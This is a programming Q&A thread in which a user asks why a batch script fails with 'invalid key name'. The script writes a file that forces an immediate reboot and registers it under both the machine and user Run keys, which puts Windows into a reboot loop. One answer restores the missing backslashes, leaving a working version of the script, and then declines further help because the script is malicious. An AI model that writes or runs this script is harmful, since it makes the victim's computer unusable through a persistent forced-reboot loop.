# Error: invalid key name, Ocurrs when running 2003 batch file

Tags: batch-file

ok so I used to make batch files in 2003 and here's a old piece of code

```
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t   reg_sz /d c:windowshartlell.bat /f
echo RIP
PAUSE
```

when I run it I get error:invalid key name for both of them

thx

ps btw my viewers want me to destroy my pc so when your testing this run it in a virtual machine

Comment: I am missing a serious question. Why should anybody run code not fully understood?

Comment: Your major issue is blatantly obvious...one of the keys on your keyboard is broken!

Answer (score 0):

As a follow up to my comment, here's your code with the 'broken' key re-added:

```bat
echo @echo off>c:\windows\hartlell.bat
echo break off>>c:\windows\hartlell.bat
echo shutdown -r -t 11 -f>>c:\windows\hartlell.bat
echo end>>c:\windows\hartlell.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v /t   reg_sz /d c:\windows\hartlell.bat /f
echo RIP
PAUSE
```

I will not be providing any further help with this script, which has other issues outside of the scope of your question, *because it is **malicious** in nature*.